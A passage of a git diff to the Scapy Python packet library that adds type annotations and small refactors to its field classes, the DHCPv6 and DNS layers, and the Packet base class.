return super(FlagValue, self).__getattribute__(attr) def __setattr__(self, attr, value): + # type: (str, Union[List[str], int, str]) -> None if attr == "value" and not isinstance(value, six.integer_types): raise ValueError(value) if attr in self.__slots__: @@ -2172,17 +2721,18 @@ def __setattr__(self, attr, value): return super(FlagValue, self).__setattr__(attr, value) def copy(self): + # type: () -> FlagValue return self.__class__(self.value, self.names) -class FlagsField(BitField): +class FlagsField(_BitField[Optional[Union[int, FlagValue]]]): """ Handle Flag type field Make sure all your flags have a label Example (list): >>> from scapy.packet import Packet - >>> class FlagsTest(Packet): + >>> class FlagsTest(BasePacket): fields_desc = [FlagsField("flags", 0, 8, ["f0", "f1", "f2", "f3", "f4", "f5", "f6", "f7"])] # noqa: E501 >>> FlagsTest(flags=9).show2() ###[ FlagsTest ]### @@ -2220,7 +2770,13 @@ class FlagsField(BitField): ismutable = True __slots__ = ["names"] - def __init__(self, name, default, size, names): + def __init__(self, + name, # type: str + default, # type: Optional[Union[int, FlagValue]] + size, # type: int + names # type: Union[List[str], str, Dict[int, str]] + ): + # type: (...) -> None # Convert the dict to a list if isinstance(names, dict): tmp = ["bit_%d" % i for i in range(size)] @@ -2229,55 +2785,70 @@ def __init__(self, name, default, size, names): names = tmp # Store the names as str or list self.names = names - BitField.__init__(self, name, default, size) + super(FlagsField, self).__init__(name, default, size) def _fixup_val(self, x): + # type: (Any) -> Optional[FlagValue] """Returns a FlagValue instance when needed. Internal method, to be used in *2i() and i2*() methods. """ - if isinstance(x, FlagValue): - return x + if isinstance(x, (FlagValue, VolatileValue)): + return x # type: ignore if x is None: return None return FlagValue(x, self.names) def any2i(self, pkt, x): + # type: (Optional[BasePacket], Any) -> Optional[FlagValue] return self._fixup_val(super(FlagsField, self).any2i(pkt, x)) def m2i(self, pkt, x): + # type: (Optional[BasePacket], int) -> Optional[FlagValue] return self._fixup_val(super(FlagsField, self).m2i(pkt, x)) def i2h(self, pkt, x): - if isinstance(x, VolatileValue): - return super(FlagsField, self).i2h(pkt, x) + # type: (Optional[BasePacket], Any) -> Optional[FlagValue] return self._fixup_val(super(FlagsField, self).i2h(pkt, x)) - def i2repr(self, pkt, x): + def i2repr(self, + pkt, # type: Optional[BasePacket] + x, # type: Any + ): + # type: (...) -> str if isinstance(x, (list, tuple)): return repr(type(x)( - None if v is None else str(self._fixup_val(v)) for v in x + "None" if v is None else str(self._fixup_val(v)) for v in x )) - return None if x is None else str(self._fixup_val(x)) + return "None" if x is None else str(self._fixup_val(x)) MultiFlagsEntry = collections.namedtuple('MultiFlagEntry', ['short', 'long']) -class MultiFlagsField(BitField): +class MultiFlagsField(_BitField[Set[str]]): __slots__ = FlagsField.__slots__ + ["depends_on"] - def __init__(self, name, default, size, names, depends_on): + def __init__(self, + name, # type: str + default, # type: Set[str] + size, # type: int + names, # type: Dict[int, Dict[int, MultiFlagsEntry]] + depends_on, # type: Callable[[BasePacket], int] + ): + # type: (...) -> None self.names = names self.depends_on = depends_on super(MultiFlagsField, self).__init__(name, default, size) def any2i(self, pkt, x): - assert isinstance(x, six.integer_types + (set,)), 'set expected' + # type: (Optional[BasePacket], Any) -> Set[str] + if not isinstance(x, (set, int)): + raise ValueError('set expected') if pkt is not None: - if isinstance(x, six.integer_types): - x = self.m2i(pkt, x) + if isinstance(x, int): + return self.m2i(pkt, x) else: v = self.depends_on(pkt) if v is not None: @@ -2292,14 +2863,19 @@ def any2i(self, pkt, x): else: assert False, 'Unknown flag "{}" with this dependency'.format(i) # noqa: E501 continue - x = s + return s + if isinstance(x, int): + return set() return x def i2m(self, pkt, x): + # type: (BasePacket, Optional[Set[str]]) -> int v = self.depends_on(pkt) these_names = self.names.get(v, {}) r = 0 + if x is None: + return r for flag_set in x: for i, val in six.iteritems(these_names): if val.short == flag_set: @@ -2310,6 +2886,7 @@ def i2m(self, pkt, x): return r def m2i(self, pkt, x): + # type: (BasePacket, int) -> Set[str] v = self.depends_on(pkt) these_names = self.names.get(v, {}) @@ -2326,6 +2903,7 @@ def m2i(self, pkt, x): return r def i2repr(self, pkt, x): + # type: (BasePacket, Set[str]) -> str v = self.depends_on(pkt) these_names = self.names.get(v, {}) @@ -2344,10 +2922,12 @@ class FixedPointField(BitField): __slots__ = ['frac_bits'] def __init__(self, name, default, size, frac_bits=16): + # type: (str, int, int, int) -> None self.frac_bits = frac_bits - BitField.__init__(self, name, default, size) + super(FixedPointField, self).__init__(name, default, size) def any2i(self, pkt, val): + # type: (Optional[BasePacket], Optional[float]) -> Optional[int] if val is None: return val ival = int(val) @@ -2355,50 +2935,72 @@ def any2i(self, pkt, val): return (ival << self.frac_bits) | fract def i2h(self, pkt, val): + # type: (Optional[BasePacket], int) -> float int_part = val >> self.frac_bits - frac_part = val & (1 << self.frac_bits) - 1 + frac_part = float(val & (1 << self.frac_bits) - 1) frac_part /= 2.0**self.frac_bits return int_part + frac_part def i2repr(self, pkt, val): - return self.i2h(pkt, val) + # type: (Optional[BasePacket], int) -> str + return str(self.i2h(pkt, val)) # Base class for IPv4 and IPv6 Prefixes inspired by IPField and IP6Field. # Machine values are encoded in a multiple of wordbytes bytes. -class _IPPrefixFieldBase(Field): +class _IPPrefixFieldBase(Field[Tuple[str, int], Tuple[bytes, int]]): __slots__ = ["wordbytes", "maxbytes", "aton", "ntoa", "length_from"] - def __init__(self, name, default, wordbytes, maxbytes, aton, ntoa, length_from): # noqa: E501 + def __init__( + self, + name, # type: str + default, # type: Tuple[str, int] + wordbytes, # type: int + maxbytes, # type: int + aton, # type: Callable[..., Any] + ntoa, # type: Callable[..., Any] + length_from=None # type: Optional[Callable[[BasePacket], int]] + ): + # type: (...) -> None self.wordbytes = wordbytes self.maxbytes = maxbytes self.aton = aton self.ntoa = ntoa Field.__init__(self, name, default, "%is" % self.maxbytes) + if length_from is None: + length_from = lambda x: 0 self.length_from = length_from def _numbytes(self, pfxlen): + # type: (int) -> int wbits = self.wordbytes * 8 return ((pfxlen + (wbits - 1)) // wbits) * self.wordbytes def h2i(self, pkt, x): + # type: (BasePacket, str) -> Tuple[str, int] # "fc00:1::1/64" -> ("fc00:1::1", 64) [pfx, pfxlen] = x.split('/') self.aton(pfx) # check for validity return (pfx, int(pfxlen)) def i2h(self, pkt, x): + # type: (BasePacket, Tuple[str, int]) -> str # ("fc00:1::1", 64) -> "fc00:1::1/64" (pfx, pfxlen) = x return "%s/%i" % (pfx, pfxlen) def i2m(self, pkt, x): + # type: (BasePacket, Optional[Tuple[str, int]]) -> Tuple[bytes, int] # ("fc00:1::1", 64) -> (b"\xfc\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01", 64) # noqa: E501 - (pfx, pfxlen) = x + if x is None: + pfx, pfxlen = "", 0 + else: + (pfx, pfxlen) = x s = self.aton(pfx) return (s[:self._numbytes(pfxlen)], pfxlen) def m2i(self, pkt, x): + # type: (BasePacket, Tuple[bytes, int]) -> Tuple[str, int] # (b"\xfc\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01", 64) -> ("fc00:1::1", 64) # noqa: E501 (s, pfxlen) = x @@ -2407,21 +3009,25 @@ def m2i(self, pkt, x): return (self.ntoa(s), pfxlen) def any2i(self, pkt, x): + # type: (BasePacket, Optional[Any]) -> Tuple[str, int] if x is None: return (self.ntoa(b"\0" * self.maxbytes), 1) return self.h2i(pkt, x) def i2len(self, pkt, x): + # type: (BasePacket, Tuple[str, int]) -> int (_, pfxlen) = x return pfxlen def addfield(self, pkt, s, val): + # type: (BasePacket, bytes, Optional[Tuple[str, int]]) -> bytes (rawpfx, pfxlen) = self.i2m(pkt, val) fmt = "!%is" % self._numbytes(pfxlen) return s + struct.pack(fmt, rawpfx) def getfield(self, pkt, s): + # type: (BasePacket, bytes) -> Tuple[bytes, Tuple[str, int]] pfxlen = self.length_from(pkt) numbytes = self._numbytes(pfxlen) fmt = "!%is" % numbytes @@ -2429,28 +3035,63 @@ def getfield(self, pkt, s): class IPPrefixField(_IPPrefixFieldBase): - def __init__(self, name, default, wordbytes=1, length_from=None): - _IPPrefixFieldBase.__init__(self, name, default, wordbytes, 4, inet_aton, inet_ntoa, length_from) # noqa: E501 + def __init__( + self, + name, # type: str + default, # type: Tuple[str, int] + wordbytes=1, # type: int + length_from=None # type: Optional[Callable[[BasePacket], int]] + ): + _IPPrefixFieldBase.__init__( + self, + name, + default, + wordbytes, + 4, + inet_aton, + inet_ntoa, + length_from + ) class IP6PrefixField(_IPPrefixFieldBase): - def __init__(self, name, default, wordbytes=1, length_from=None): - _IPPrefixFieldBase.__init__(self, name, default, wordbytes, 16, lambda a: inet_pton(socket.AF_INET6, a), lambda n: inet_ntop(socket.AF_INET6, n), length_from) # noqa: E501 + def __init__( + self, + name, # type: str + default, # type: Tuple[str, int] + wordbytes=1, # type: int + length_from=None # type: Optional[Callable[[BasePacket], int]] + ): + # type: (...) -> None + _IPPrefixFieldBase.__init__( + self, + name, + default, + wordbytes, + 16, + lambda a: inet_pton(socket.AF_INET6, a), + lambda n: inet_ntop(socket.AF_INET6, n), + length_from + ) -class UTCTimeField(IntField): +class UTCTimeField(Field[float, int]): __slots__ = ["epoch", "delta", "strf", "use_msec", "use_micro", "use_nano"] # Do not change the order of the keywords in here # Netflow heavily rely on this - def __init__(self, name, default, - use_msec=False, - use_micro=False, - use_nano=False, - epoch=None, - strf="%a, %d %b %Y %H:%M:%S %z"): - IntField.__init__(self, name, default) + def __init__(self, + name, # type: str + default, # type: int + use_msec=False, # type: bool + use_micro=False, # type: bool + use_nano=False, # type: bool + epoch=None, # type: Optional[Tuple[int, int, int, int, int, int, int, int, int]] # noqa: E501 + strf="%a, %d %b %Y %H:%M:%S %z", # type: str + ): + # type: (...) -> None + Field.__init__(self, name, default, "I") mk_epoch = EPOCH if epoch is None else calendar.timegm(epoch) self.epoch = mk_epoch self.delta = mk_epoch - EPOCH @@ -2460,6 +3101,7 @@ def __init__(self, name, default, self.use_nano = use_nano def i2repr(self, pkt, x): + # type: (BasePacket, float) -> str if x is None: x = 0 elif self.use_msec: @@ -2473,10 +3115,11 @@ def i2repr(self, pkt, x): return "%s (%d)" % (t, x) def i2m(self, pkt, x): + # type: (BasePacket, Optional[float]) -> int return int(x) if x is not None else 0 -class SecondsIntField(IntField): +class SecondsIntField(Field[float, int]): __slots__ = ["use_msec", "use_micro", "use_nano"] # Do not change the order of the keywords in here @@ -2485,33 +3128,49 @@ def __init__(self, name, default, use_msec=False, use_micro=False, use_nano=False): - IntField.__init__(self, name, default) + # type: (str, int, bool, bool, bool) -> None + Field.__init__(self, name, default, "I") self.use_msec = use_msec self.use_micro = use_micro self.use_nano = use_nano def i2repr(self, pkt, x): + # type: (Optional[BasePacket], Optional[float]) -> str if x is None: - x = 0 + y = 0 # type: Union[int, float] elif self.use_msec: - x = x / 1e3 + y = x / 1e3 elif self.use_micro: - x = x / 1e6 + y = x / 1e6 elif self.use_nano: - x = x / 1e9 - return "%s sec" % x + y = x / 1e9 + else: + y = x + return "%s sec" % y class _ScalingField(object): - def __init__(self, name, default, scaling=1, unit="", - offset=0, ndigits=3, fmt="B"): + def __init__(self, + name, # type: str + default, # type: float + scaling=1, # type: int + unit="", # type: str + offset=0, # type: int + ndigits=3, # type: int + fmt="B", # type: str + ): + # type: (...) -> None self.scaling = scaling self.unit = unit self.offset = offset self.ndigits = ndigits Field.__init__(self, name, default, fmt) - def i2m(self, pkt, x): + def i2m(self, + pkt, # type: Optional[BasePacket] + x # type: Optional[Union[int, float]] + ): + # type: (...) -> Union[int, float] if x is None: x = 0 x = (x - self.offset) / self.scaling @@ -2520,22 +3179,28 @@ def i2m(self, pkt, x): return x def m2i(self, pkt, x): + # type: (Optional[BasePacket], Union[int, float]) -> Union[int, float] x = x * self.scaling + self.offset if isinstance(x, float) and self.fmt[-1] != "f": x = round(x, self.ndigits) return x def any2i(self, pkt, x): + # type: (Optional[BasePacket], Any) -> Union[int, float] if isinstance(x, (str, bytes)): x = struct.unpack(self.fmt, bytes_encode(x))[0] x = self.m2i(pkt, x) + if not isinstance(x, (int, float)): + raise ValueError("Unknown type") return x def i2repr(self, pkt, x): + # type: (Optional[BasePacket], Union[int, float]) -> str return "%s %s" % (self.i2h(pkt, x), self.unit) def randval(self): - value = super(_ScalingField, self).randval() + # type: () -> RandFloat + value = super(ScalingField, self).randval() if value is not None: min_val = round(value.min * self.scaling + self.offset, self.ndigits) @@ -2545,12 +3210,13 @@ def randval(self): return RandFloat(min(min_val, max_val), max(min_val, max_val)) -class ScalingField(_ScalingField, Field): +class ScalingField(_ScalingField, + Field[Union[int, float], Union[int, float]]): """ Handle physical values which are scaled and/or offset for communication Example: >>> from scapy.packet import Packet - >>> class ScalingFieldTest(Packet): + >>> class ScalingFieldTest(BasePacket): fields_desc = [ScalingField('data', 0, scaling=0.1, offset=-1, unit='mV')] # noqa: E501 >>> ScalingFieldTest(data=10).show2() ###[ ScalingFieldTest ]### @@ -2586,7 +3252,6 @@ class ScalingField(_ScalingField, Field): :param fmt: struct.pack format used to parse and serialize the internal value from and to machine representation # noqa: E501 """ - class BitScalingField(_ScalingField, BitField): """ A ScalingField that is a BitField @@ -2596,7 +3261,7 @@ def __init__(self, name, default, size, *args, **kwargs): BitField.__init__(self, name, default, size) -class UUIDField(Field): +class UUIDField(Field[UUID, bytes]): """Field for UUID storage, wrapping Python's uuid.UUID type. The internal storage format of this field is ``uuid.UUID`` from the Python @@ -2660,17 +3325,20 @@ class UUIDField(Field): FORMATS = (FORMAT_BE, FORMAT_LE, FORMAT_REV) def __init__(self, name, default, uuid_fmt=FORMAT_BE): + # type: (str, Optional[int], int) -> None self.uuid_fmt = uuid_fmt self._check_uuid_fmt() Field.__init__(self, name, default, "16s") def _check_uuid_fmt(self): + # type: () -> None """Checks .uuid_fmt, and raises an exception if it is not valid.""" if self.uuid_fmt not in UUIDField.FORMATS: raise FieldValueRangeException( "Unsupported uuid_fmt ({})".format(self.uuid_fmt)) def i2m(self, pkt, x): + # type: (Optional[BasePacket], Optional[UUID]) -> bytes self._check_uuid_fmt() if x is None: return b'\0' * 16 @@ -2680,8 +3348,14 @@ def i2m(self, pkt, x): return x.bytes_le elif self.uuid_fmt == UUIDField.FORMAT_REV: return x.bytes[::-1] + else: + raise FieldAttributeException("Unknown fmt") - def m2i(self, pkt, x): + def m2i(self, + pkt, # type: Optional[BasePacket] + x, # type: bytes + ): + # type: (...) -> UUID self._check_uuid_fmt() if self.uuid_fmt == UUIDField.FORMAT_BE: return UUID(bytes=x) @@ -2689,15 +3363,21 @@ def m2i(self, pkt, x): return UUID(bytes_le=x) elif self.uuid_fmt == UUIDField.FORMAT_REV: return UUID(bytes=x[::-1]) + else: + raise FieldAttributeException("Unknown fmt") - def any2i(self, pkt, x): + def any2i(self, + pkt, # type: Optional[BasePacket] + x # type: Any # noqa: E501 + ): + # type: (...) -> Optional[UUID] # Python's uuid doesn't handle bytearray, so convert to an immutable # type first. if isinstance(x, bytearray): - x = bytes(x) + x = bytes_encode(x) - if isinstance(x, six.integer_types): - x = UUID(int=x) + if isinstance(x, int): + u = UUID(int=x) elif isinstance(x, tuple): if len(x) == 11: # For compatibility with dce_rpc: this packs into a tuple where @@ -2708,21 +3388,26 @@ def any2i(self, pkt, x): x = (x[0], x[1], x[2], x[3], x[4], node) - x = UUID(fields=x) - elif isinstance(x, (six.binary_type, six.text_type)): + u = UUID(fields=x) + elif isinstance(x, (str, bytes)): if len(x) == 16: # Raw bytes - x = self.m2i(pkt, x) + u = self.m2i(pkt, bytes_encode(x)) else: - x = UUID(plain_str(x)) - return x + u = UUID(plain_str(x)) + elif isinstance(x, UUID): + u = x + else: + return None + return u @staticmethod def randval(): + # type: () -> RandUUID return RandUUID() -class BitExtendedField(Field): +class BitExtendedField(Field[Optional[int], bytes]): """ Bit Extended Field @@ -2741,6 +3426,7 @@ class BitExtendedField(Field): __slots__ = ["extension_bit"] def prepare_byte(self, x): + # type: (int) -> int # Moves the forwarding bit to the LSB x = int(x) fx_bit = (x & 2**self.extension_bit) >> self.extension_bit @@ -2749,7 +3435,8 @@ def prepare_byte(self, x): x = (msb_bits << (self.extension_bit + 1)) + (lsb_bits << 1) + fx_bit return x - def str2extended(self, x=""): + def str2extended(self, x=b""): + # type: (bytes) -> Tuple[bytes, Optional[int]] # For convenience, we reorder the byte so that the forwarding # bit is always the LSB. We then apply the same algorithm # whatever the real forwarding bit position @@ -2771,11 +3458,14 @@ def str2extended(self, x=""): if end is None: # We reached the end of the data but there was no # "ending bit". This is not normal. - return None, None + return b"", None else: return end, bits def extended2str(self, x): + # type: (Optional[int]) -> bytes + if x is None: + return b"" x = int(x) s = [] LSByte = True @@ -2811,29 +3501,36 @@ def extended2str(self, x): return result def __init__(self, name, default, extension_bit): + # type: (str, Optional[Any], int) -> None Field.__init__(self, name, default, "B") self.extension_bit = extension_bit def i2m(self, pkt, x): + # type: (Optional[Any], Optional[int]) -> bytes return self.extended2str(x) def m2i(self, pkt, x): + # type: (Optional[Any], bytes) -> Optional[int] return self.str2extended(x)[1] def addfield(self, pkt, s, val): + # type: (Optional[BasePacket], bytes, Optional[int]) -> bytes return s + self.i2m(pkt, val) def getfield(self, pkt, s): + # type: (Optional[Any], bytes) -> Tuple[bytes, Optional[int]] return self.str2extended(s) class LSBExtendedField(BitExtendedField): # This is a BitExtendedField with the extension bit on LSB def __init__(self, name, default): + # type: (str, Optional[Any]) -> None BitExtendedField.__init__(self, name, default, extension_bit=0) class MSBExtendedField(BitExtendedField): # This is a BitExtendedField with the extension bit on MSB def __init__(self, name, default): + # type: (str, Optional[Any]) -> None BitExtendedField.__init__(self, name, default, extension_bit=7) diff --git a/scapy/layers/dhcp6.py b/scapy/layers/dhcp6.py index 2c8a666cb50..63a51048baf 100644 --- a/scapy/layers/dhcp6.py +++ b/scapy/layers/dhcp6.py @@ -22,7 +22,7 @@ from scapy.compat import raw, orb from scapy.error import warning from scapy.fields import BitField, ByteEnumField, ByteField, FieldLenField, \ - FlagsField, IntEnumField, IntField, MACField, PacketField, \ + FlagsField, IntEnumField, IntField, MACField, \ PacketListField, ShortEnumField, ShortField, StrField, StrFixedLenField, \ StrLenField, UTCTimeField, X3BytesField, XIntField, XShortEnumField, \ PacketLenField, UUIDField, FieldListField @@ -343,34 +343,20 @@ class DHCP6OptUnknown(_DHCP6OptGuessPayload): # A generic DHCPv6 Option length_from=lambda pkt: pkt.optlen)] -class _DUIDField(PacketField): - __slots__ = ["length_from"] - - def __init__(self, name, default, length_from=None): - StrField.__init__(self, name, default) - self.length_from = length_from - - def i2m(self, pkt, i): - return raw(i) - - def m2i(self, pkt, x): - cls = conf.raw_layer - if len(x) > 4: - o = struct.unpack("!H", x[:2])[0] - cls = get_cls(duid_cls.get(o, conf.raw_layer), conf.raw_layer) - return cls(x) - - def getfield(self, pkt, s): - tmp_len = self.length_from(pkt) - return s[tmp_len:], self.m2i(pkt, s[:tmp_len]) +def _duid_dispatcher(x): + cls = conf.raw_layer + if len(x) > 4: + o = struct.unpack("!H", x[:2])[0] + cls = get_cls(duid_cls.get(o, conf.raw_layer), conf.raw_layer) + return cls(x) class DHCP6OptClientId(_DHCP6OptGuessPayload): # RFC 8415 sect 21.2 name = "DHCP6 Client Identifier Option" fields_desc = [ShortEnumField("optcode", 1, dhcp6opts), FieldLenField("optlen", None, length_of="duid", fmt="!H"), - _DUIDField("duid", "", - length_from=lambda pkt: pkt.optlen)] + PacketLenField("duid", "", _duid_dispatcher, + length_from=lambda pkt: pkt.optlen)] class DHCP6OptServerId(DHCP6OptClientId): # RFC 8415 sect 21.3 diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index dbd08316b40..20cce3cdf61 100755 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -15,8 +15,8 @@ from scapy.config import conf from scapy.packet import Packet, bind_layers, NoPayload from scapy.fields import BitEnumField, BitField, ByteEnumField, ByteField, \ - ConditionalField, FieldLenField, FlagsField, IntField, \ - PacketListField, ShortEnumField, ShortField, StrField, StrFixedLenField, \ + ConditionalField, Field, FieldLenField, FlagsField, IntField, \ + PacketListField, ShortEnumField, ShortField, StrField, \ StrLenField, MultipleTypeField, UTCTimeField from scapy.compat import orb, raw, chb, bytes_encode from scapy.ansmachine import AnsweringMachine @@ -239,7 +239,6 @@ class DNSStrField(StrLenField): It will also handle DNS decompression. (may be StrLenField if a length_from is passed), """ - def h2i(self, pkt, x): if not x: return b"." @@ -254,7 +253,7 @@ def i2len(self, pkt, x): def getfield(self, pkt, s): remain = b"" if self.length_from: - remain, s = StrLenField.getfield(self, pkt, s) + remain, s = super(DNSStrField, self).getfield(pkt, s) # Decode the compressed DNS message decoded, _, left = dns_get_str(s, 0, pkt) # returns (remaining, decoded) @@ -820,9 +819,9 @@ class DNSRRSRV(_DNSRRdummy): "hmac-sha1": 20} -class TimeSignedField(StrFixedLenField): +class TimeSignedField(Field[int, bytes]): def __init__(self, name, default): - StrFixedLenField.__init__(self, name, default, 6) + Field.__init__(self, name, default, fmt="6s") def _convert_seconds(self, packed_seconds): """Unpack the internal representation.""" @@ -830,7 +829,7 @@ def _convert_seconds(self, packed_seconds): seconds += struct.unpack("!I", packed_seconds[2:])[0] return seconds - def h2i(self, pkt, seconds): + def i2m(self, pkt, seconds): """Convert the number of seconds since 1-Jan-70 UTC to the packed representation.""" @@ -842,7 +841,7 @@ def h2i(self, pkt, seconds): return struct.pack("!HI", tmp_short, tmp_int) - def i2h(self, pkt, packed_seconds): + def m2i(self, pkt, packed_seconds): """Convert the internal representation to the number of seconds since 1-Jan-70 UTC.""" @@ -854,7 +853,7 @@ def i2h(self, pkt, packed_seconds): def i2repr(self, pkt, packed_seconds): """Convert the internal representation to a nice one using the RFC format.""" - time_struct = time.gmtime(self._convert_seconds(packed_seconds)) + time_struct = time.gmtime(packed_seconds) return time.strftime("%a %b %d %H:%M:%S %Y", time_struct) diff --git a/scapy/layers/dot11.py b/scapy/layers/dot11.py index e6032b84b85..c39bd060163 100644 --- a/scapy/layers/dot11.py +++ b/scapy/layers/dot11.py @@ -63,6 +63,7 @@ X3BytesField, XByteField, XStrFixedLenField, + _BitField, ) from scapy.ansmachine import AnsweringMachine from scapy.plist import PacketList diff --git a/scapy/layers/inet.py b/scapy/layers/inet.py index cfa1055a248..6b0a7970fbc 100644 --- a/scapy/layers/inet.py +++ b/scapy/layers/inet.py @@ -36,7 +36,7 @@ from scapy.packet import Packet, bind_layers, bind_bottom_up, NoPayload from scapy.volatile import RandShort, RandInt, RandBin, RandNum, VolatileValue from scapy.sendrecv import sr, sr1 -from scapy.plist import PacketList, SndRcvList +from scapy.plist import _PacketList, PacketList, SndRcvList from scapy.automaton import Automaton, ATMT from scapy.error import log_runtime, warning from scapy.pton_ntop import inet_pton @@ -1205,7 +1205,7 @@ def _wrap_data(ts_tuple, wrap_seconds=2000): return lines -PacketList.timeskew_graph = _packetlist_timeskew_graph +_PacketList.timeskew_graph = _packetlist_timeskew_graph # Create a new packet list diff --git a/scapy/layers/tls/record.py b/scapy/layers/tls/record.py index d0031e909cc..f45bf80d9aa 100644 --- a/scapy/layers/tls/record.py +++ b/scapy/layers/tls/record.py @@ -76,7 +76,7 @@ class _TLSMsgListField(PacketListField): def __init__(self, name, default, length_from=None): if not length_from: length_from = self._get_length - super(_TLSMsgListField, self).__init__(name, default, cls=None, + super(_TLSMsgListField, self).__init__(name, default, None, length_from=length_from) def _get_length(self, pkt): diff --git a/scapy/main.py b/scapy/main.py index 6b0bd27e8fb..deacf9f0f0e 100644 --- a/scapy/main.py +++ b/scapy/main.py @@ -34,7 +34,15 @@ from scapy.themes import DefaultTheme, BlackAndWhite, apply_ipython_style from scapy.consts import WINDOWS -from scapy.compat import cast, Any, Dict, List, Optional, Tuple, Union +from scapy.compat import ( + cast, + Any, + Dict, + List, + Optional, + Tuple, + Union +) IGNORED = list(six.moves.builtins.__dict__) diff --git a/scapy/packet.py b/scapy/packet.py index 6154caeffd3..489b281e1d4 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -24,11 +24,11 @@ import warnings from scapy.fields import StrField, ConditionalField, Emph, PacketListField, \ - BitField, MultiEnumField, EnumField, FlagsField, MultipleTypeField + BitField, MultiEnumField, EnumField, FlagsField, MultipleTypeField, Field from scapy.config import conf, _version_checker from scapy.compat import raw, orb, bytes_encode from scapy.base_classes import BasePacket, Gen, SetGen, Packet_metaclass, \ - _CanvasDumpExtended + _CanvasDumpExtended, Field_metaclass from scapy.volatile import RandField, VolatileValue from scapy.utils import import_hexcap, tex_escape, colgen, issubtype, \ pretty_list @@ -36,6 +36,21 @@ from scapy.extlib import PYX import scapy.modules.six as six +from scapy.compat import ( + Any, + Callable, + Dict, + Iterator, + List, + NoReturn, + Optional, + Set, + Tuple, + TypeVar, + Union, + cast, +) + try: import pyx except ImportError: @@ -44,20 +59,28 @@ class RawVal: def __init__(self, val=""): + # type: (str) -> None self.val = val def __str__(self): + # type: () -> str return str(self.val) def __bytes__(self): - return raw(self.val) + # type: () -> bytes + return bytes_encode(self.val) def __repr__(self): + # type: () -> str return "" % self.val -class Packet(six.with_metaclass(Packet_metaclass, BasePacket, - _CanvasDumpExtended)): +_T = TypeVar("_T", Dict[str, Any], Optional[Dict[str, Any]]) + + +# six.with_metaclass typing is glitchy +class Packet(six.with_metaclass(Packet_metaclass, # type: ignore + BasePacket, _CanvasDumpExtended)): __slots__ = [ "time", "sent_time", "name", "default_fields", "fields", "fieldtype", @@ -76,34 +99,38 @@ class Packet(six.with_metaclass(Packet_metaclass, BasePacket, "wirelen", ] name = None - fields_desc = [] - deprecated_fields = {} - overload_fields = {} - payload_guess = [] + fields_desc = [] # type: List[Field[Any, Any]] + deprecated_fields = {} # type: Dict[str, Tuple[str, str]] + overload_fields = {} # type: Dict[Packet_metaclass, Dict[str, Any]] + payload_guess = [] # type: List[Tuple[Dict[str, Any], Packet_metaclass]] show_indent = 1 show_summary = True match_subclass = False - class_dont_cache = dict() - class_packetfields = dict() - class_default_fields = dict() - class_default_fields_ref = dict() - class_fieldtype = dict() + class_dont_cache = {} # type: Dict[Packet_metaclass, bool] + class_packetfields = {} # type: Dict[Packet_metaclass, Any] + class_default_fields = {} # type: Dict[Packet_metaclass, Dict[str, Any]] + class_default_fields_ref = {} # type: Dict[Packet_metaclass, List[str]] + class_fieldtype = {} # type: Dict[Packet_metaclass, Dict[str, Field[Any, Any]]] # noqa: E501 @classmethod def from_hexcap(cls): - return cls(import_hexcap()) + # type: (Packet_metaclass) -> Packet + return cls(import_hexcap()) # type: ignore @classmethod def upper_bonds(self): + # type: () -> None for fval, upper in self.payload_guess: print("%-20s %s" % (upper.__name__, ", ".join("%-12s" % ("%s=%r" % i) for i in six.iteritems(fval)))) # noqa: E501 @classmethod def lower_bonds(self): + # type: () -> None for lower, fval in six.iteritems(self._overload_fields): print("%-20s %s" % (lower.__name__, ", ".join("%-12s" % ("%s=%r" % i) for i in six.iteritems(fval)))) # noqa: E501 def __reduce__(self): + # type: () -> Tuple[Packet_metaclass, Tuple[()], Tuple[bytes]] """Used by pickling methods""" return (self.__class__, (), ( self.build(), @@ -115,10 +142,12 @@ def __reduce__(self): )) def __getstate__(self): + # type: () -> Tuple[bytes] """Mark object as pickable""" return self.__reduce__()[2] def __setstate__(self, state): + # type: (Tuple[bytes]) -> Packet """Rebuild state using pickable methods""" self.__init__(state[0]) self.time = state[1] @@ -128,29 +157,39 @@ def __setstate__(self, state): self.wirelen = state[5] return self - def __deepcopy__(self, memo): + def __deepcopy__(self, + memo, # type: Any + ): + # type: (...) -> Packet """Used by copy.deepcopy""" return self.copy() - def __init__(self, _pkt=b"", post_transform=None, _internal=0, _underlayer=None, **fields): # noqa: E501 + def __init__(self, + _pkt=b"", # type: bytes + post_transform=None, # type: Any + _internal=0, # type: int + _underlayer=None, # type: Optional[Packet] + **fields # type: Any + ): + # type: (...) -> None self.time = time.time() - self.sent_time = None + self.sent_time = None # type: Union[None, float] self.name = (self.__class__.__name__ if self._name is None else self._name) - self.default_fields = {} + self.default_fields = {} # type: Dict[str, Any] self.overload_fields = self._overload_fields - self.overloaded_fields = {} - self.fields = {} - self.fieldtype = {} - self.packetfields = [] + self.overloaded_fields = {} # type: Dict[str, Any] + self.fields = {} # type: Dict[str, Any] + self.fieldtype = {} # type: Dict[str, Field[Any, Any]] + self.packetfields = [] # type: List[Field[Any, Any]] self.payload = NoPayload() self.init_fields() self.underlayer = _underlayer self.original = _pkt self.explicit = 0 - self.raw_packet_cache = None - self.raw_packet_cache_fields = None + self.raw_packet_cache = None # type: Optional[bytes] + self.raw_packet_cache_fields = None # type: Optional[Dict[str, Any]] # noqa: E501 self.wirelen = None self.direction = None self.sniffed_on = None @@ -185,6 +224,7 @@ def __init__(self, _pkt=b"", post_transform=None, _internal=0, _underlayer=None, self.post_transforms = [post_transform] def init_fields(self): + # type: () -> None """ Initialize each fields of the fields_desc dict """ @@ -194,7 +234,10 @@ def init_fields(self): else: self.do_init_cached_fields() - def do_init_fields(self, flist): + def do_init_fields(self, + flist, # type: List[Field[Any, Any]] + ): + # type: (...) -> None """ Initialize each fields of the fields_desc dict """ @@ -208,6 +251,7 @@ def do_init_fields(self, flist): self.default_fields = default_fields def do_init_cached_fields(self): + # type: () -> None """ Initialize each fields of the fields_desc dict, or use the cached fields information @@ -236,6 +280,7 @@ def do_init_cached_fields(self): self.fields[fname] = value[:] def prepare_cached_fields(self, flist): + # type: (List[Field[Any, Any]]) -> None """ Prepare the cached fields of the fields_desc dict """ @@ -277,19 +322,23 @@ def prepare_cached_fields(self, flist): Packet.class_default_fields[cls_name] = class_default_fields def dissection_done(self, pkt): + # type: (Packet) -> None """DEV: will be called after 